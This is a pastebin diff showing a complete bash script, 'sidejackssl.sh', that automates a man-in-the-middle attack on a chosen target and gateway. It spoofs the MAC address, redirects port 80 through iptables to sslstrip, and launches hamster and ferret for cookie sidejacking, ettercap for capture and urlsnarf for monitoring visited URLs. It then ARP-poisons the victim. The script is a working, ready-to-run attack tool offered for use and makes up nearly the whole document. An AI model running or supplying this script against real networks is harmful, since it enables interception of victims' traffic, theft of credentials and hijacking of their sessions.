View difference between Paste ID: SjHm7quG and
SHOW:
|
|
- or go back to the newest paste.
1 | - | |
1 | + | #!/bin/bash |
2 | ||
3 | # sidejackssl.sh v0.1 | |
4 | # tested in backtrack 4 R2 environment, run as root. | |
5 | # xterm used for window control | |
6 | # arpspoof poisons a single victim and gateway | |
7 | # ferret and hamster for sidejacking | |
8 | # sslstrip for https | |
9 | # ettercap for everything else | |
10 | # urlsnarf to monitor visited urls | |
11 | # firefox needs to be configured with a proxy of 127.0.0.1:1234 | |
12 | # url for hamster server is http://hamster | |
13 | # by gorara | |
14 | ||
15 | # a few variables (do not change) | |
16 | m1="0" # missing file var m1 | |
17 | m2="0" # missing file var m2 | |
18 | m3="0" # missing file var m3 | |
19 | m4="0" # missing file var m4 | |
20 | quickclean="0" # used for quick clean up | |
21 | randmac="n" # default setting do not randomize MAC | |
22 | hamsterfile="hamster.txt" # hamster output file (you can't change it) | |
23 | trap 'cleanup' SIGINT SIGTERM # detect control-c | |
24 | ||
25 | # a few more variables (change these if required) | |
26 | ||
27 | # xterm window variables | |
28 | x="0" # x offset value | |
29 | y="0" # y offset value | |
30 | width="120" # width value | |
31 | height="7" # height value | |
32 | yoffset="120" # y offset | |
33 | fgcolor="white" # foreground color | |
34 | bgcolor="black" # background color | |
35 | ||
36 | # style variables | |
37 | warnstyle="[\e[01;38mw\e[00m]" # warning msgs style | |
38 | execstyle="[\e[01;32mx\e[00m]" # execute msgs style | |
39 | infostyle="[\e[01;34mi\e[00m]" # informational msgs style | |
40 | inputstyle="[\e[01;30m?\e[00m]" # input msgs style | |
41 | ||
42 | # file variables | |
43 | sslstripfile="sslstrip.log" # sslstrip output file name | |
44 | snifffile="sniff-*" # hamster sniff file wildcard | |
45 | etterfile="etter.cap" # ettercap output cap file | |
46 | temp="/tmp" # temporary dir | |
47 | ||
48 | function usage | |
49 | { | |
50 | clear | |
51 | echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]" | |
52 | echo "" | |
53 | echo " -i interface interface to use, ex. eth0, wlan0." | |
54 | echo " -t target the target IP address." | |
55 | echo " -g gateway the gateway IP address." | |
56 | echo " -r randomize your MAC address," | |
57 | echo " only use for wired interfaces." | |
58 | echo " -h display this help screen." | |
59 | echo "" | |
60 | echo " examples: " | |
61 | echo " bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r" | |
62 | echo " bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254" | |
63 | echo "" | |
64 | exit 0 | |
65 | } | |
66 | ||
67 | function cleanup() { | |
68 | echo -e "\n$warnstyle control-c pressed! " | |
69 | ||
70 | # exit script if nothing has been modified | |
71 | if [[ "$quickclean" = "1" ]]; then | |
72 | echo -e "$infostyle nothing changed, all done!" | |
73 | exit 0 | |
74 | fi | |
75 | ||
76 | echo -e "$infostyle cleaning up..." | |
77 | echo -e "$execstyle flushing iptables..." | |
78 | iptables -F | |
79 | iptables -t nat -F | |
80 | ||
81 | echo -e "$execstyle turning off IP forwarding..." | |
82 | echo "0" > /proc/sys/net/ipv4/ip_forward | |
83 | ||
84 | # change back MAC address to orignal one | |
85 | if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then | |
86 | echo -e "$execstyle resetting MAC address..."; | |
87 | echo -e "$infostyle original MAC is: $origmac" | |
88 | ifconfig $interface down | |
89 | ifconfig $interface hw ether $origmac | |
90 | ifconfig $interface up | |
91 | if [ -z $gw ]; then | |
92 | echo -e "$warnstyle WARNING, you have no default gateway!" | |
93 | else | |
94 | route add default gw $gw | |
95 | fi | |
96 | rm $temp/mac.orig | |
97 | rm $temp/gw.orig | |
98 | fi | |
99 | ||
100 | echo -e "$execstyle cleaning up files..." | |
101 | echo -e "$infostyle temp directory: " | |
102 | ||
103 | # testing to see if files exist, if so display them... | |
104 | if [ -f $temp/$sslstripfile ]; then | |
105 | ls $temp/$sslstripfile | |
106 | else | |
107 | #echo -e "$warnstyle missing $sslstripfile" | |
108 | m1="1" | |
109 | fi | |
110 | ||
111 | if [ -f $temp/$etterfile ]; then | |
112 | ls $temp/$etterfile | |
113 | else | |
114 | #echo -e "$warnstyle missing $etterfile" | |
115 | m2="1" | |
116 | fi | |
117 | ||
118 | echo -e "$infostyle current directory: " | |
119 | ||
120 | if [ -f $snifffile ]; then | |
121 | ls $snifffile | |
122 | else | |
123 | #echo -e "$warnstyle missing $snifffile" | |
124 | m3="1" | |
125 | fi | |
126 | ||
127 | if [ -f $hamsterfile ]; then | |
128 | ls $hamsterfile | |
129 | else | |
130 | #echo -e "$warnstyle missing $hamsterfile" | |
131 | m4="1" | |
132 | fi | |
133 | ||
134 | # testing to see if there are any files at all | |
135 | if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then | |
136 | ||
137 | while [[ "$delete" != "y" || "$delete" != "n" ]] | |
138 | ||
139 | echo -en "$infostyle delete file(s)? [y/n]: " | |
140 | read delete | |
141 | ||
142 | do | |
143 | case "$delete" in | |
144 | y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;; | |
145 | n) echo -e "$warnstyle nothing deleted!"; break;; | |
146 | *) echo -e "$warnstyle wrong selection!"; | |
147 | esac | |
148 | done | |
149 | ||
150 | # delete files as requested | |
151 | if [[ "$delete_marker" = "y" ]]; then | |
152 | if [ -f $temp/$sslstripfile ]; then | |
153 | rm $temp/$sslstripfile | |
154 | fi | |
155 | ||
156 | if [ -f $temp/$etterfile ]; then | |
157 | rm $temp/$etterfile | |
158 | fi | |
159 | ||
160 | if [ -f $snifffile ]; then | |
161 | rm $snifffile | |
162 | fi | |
163 | ||
164 | if [ -f $hamsterfile ]; then | |
165 | rm $hamsterfile | |
166 | fi | |
167 | fi | |
168 | ||
169 | else | |
170 | ||
171 | echo -e "$warnstyle nothing to delete!" | |
172 | fi | |
173 | ||
174 | echo -e "$infostyle all done!" | |
175 | exit 0 | |
176 | } | |
177 | ||
178 | ||
179 | # start main program | |
180 | if [ "$#" -eq 0 ]; then | |
181 | usage | |
182 | fi | |
183 | ||
184 | while [ "$#" -gt 0 ] | |
185 | do | |
186 | case "$1" in | |
187 | -i) interface=$2; shift 1;; | |
188 | -r) randmac="y"; shift 1;; | |
189 | -t) target=$2; shift 1;; | |
190 | -g) gateway=$2; shift 1;; | |
191 | -h) usage;; | |
192 | -*) usage; break;; | |
193 | *) break;; | |
194 | esac | |
195 | shift | |
196 | done | |
197 | ||
198 | # required parameters | |
199 | if [[ -z $interface || -z $target || -z $gateway ]]; then | |
200 | usage | |
201 | exit 0 | |
202 | fi | |
203 | ||
204 | clear | |
205 | ||
206 | if [[ "$randmac" = "y" ]]; then | |
207 | mac="yes" | |
208 | else | |
209 | mac="no" | |
210 | fi | |
211 | ||
212 | # set quick cleanup flag | |
213 | quickclean="1" | |
214 | ||
215 | echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara" | |
216 | echo -e "$infostyle ctrl-c to abort at any time." | |
217 | echo -e "$infostyle attack summary:" | |
218 | echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac" | |
219 | ||
220 | if [[ "$randmac" = "y" ]]; then | |
221 | ||
222 | echo -e "$execstyle change of $interface MAC address requested." | |
223 | ||
224 | if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then | |
225 | echo -e "$infostyle wireless device detected..." | |
226 | echo -e "$warnstyle can't change MAC address without taking wifi interface down" | |
227 | echo -e "$warnstyle do it manually before connecting to the AP." | |
228 | exit 0 | |
229 | fi | |
230 | ||
231 | if [[ "$interface" = eth* ]]; then | |
232 | echo -e "$infostyle wired device detected..." | |
233 | echo -e "$warnstyle WARNING, this will take your wired interface down temporarily." | |
234 | echo -en "$inputstyle do you want to continue? [y/n]: " | |
235 | read continue | |
236 | if [[ "$continue" = "y" ]]; then | |
237 | echo -e "$infostyle proceeding..." | |
238 | else | |
239 | echo -e "$infostyle exiting..." | |
240 | exit 0 | |
241 | fi | |
242 | fi | |
243 | ||
244 | origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}` | |
245 | ||
246 | fi | |
247 | ||
248 | # before this, ctrl-c will exit script without doing anything. | |
249 | quickclean="0" | |
250 | ||
251 | # use macchanger to randomize MAC address, ect. | |
252 | if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then | |
253 | echo -e "$execstyle randomizing MAC address..."; | |
254 | gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig | |
255 | ifconfig $interface down | |
256 | macchanger -r $interface > $temp/mac.orig | |
257 | ifconfig $interface up | |
258 | if [ -z $gw ]; then | |
259 | echo -e "$warnstyle WARNING, you have no default gateway!" | |
260 | else | |
261 | route add default gw $gw | |
262 | fi | |
263 | origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}` | |
264 | fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}` | |
265 | echo -e "$infostyle original MAC is: $origmac" | |
266 | echo -e "$infostyle faked MAC is: $fakemac" | |
267 | fi | |
268 | ||
269 | echo -e "$execstyle turning on IP Forwarding..." | |
270 | echo "1" > /proc/sys/net/ipv4/ip_forward | |
271 | ||
272 | echo -e "$execstyle configuring iptables..." | |
273 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 | |
274 | sleep 1 | |
275 | ||
276 | echo -e "$execstyle starting hamster ... <logging to: $hamsterfile>" | |
277 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster & | |
278 | sleep 2 | |
279 | ||
280 | echo -e "$execstyle starting ferret ... <logging to: console>" | |
281 | y=$(($y+$yoffset)) | |
282 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface & | |
283 | sleep 2 | |
284 | ||
285 | echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>" | |
286 | y=$(($y+$yoffset)) | |
287 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile & | |
288 | sleep 2 | |
289 | ||
290 | echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>" | |
291 | y=$(($y+$yoffset)) | |
292 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ & | |
293 | sleep 2 | |
294 | ||
295 | echo -e "$execstyle starting urlsnarf ... <logging to: console>" | |
296 | y=$(($y+$yoffset)) | |
297 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface & | |
298 | sleep 2 | |
299 | ||
300 | echo -e "$infostyle trap is ready, now to direct traffic..." | |
301 | ||
302 | echo -e "$execstyle ARP poisoning the target..." | |
303 | y=$(($y+$yoffset)) | |
304 | xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway & | |
305 | sleep 1 | |
306 | ||
307 | echo -e "$infostyle run firefox and type http://hamster" | |
308 | echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234" | |
309 | echo -e "$infostyle press ctrl-c to exit and clean up... \n" | |
310 | for ((;;)) do | |
311 | read loop | |
312 | echo -en "$infostyle press ctrl-c to terminate!" | |
313 | done | |
314 | ||
315 | exit 0 |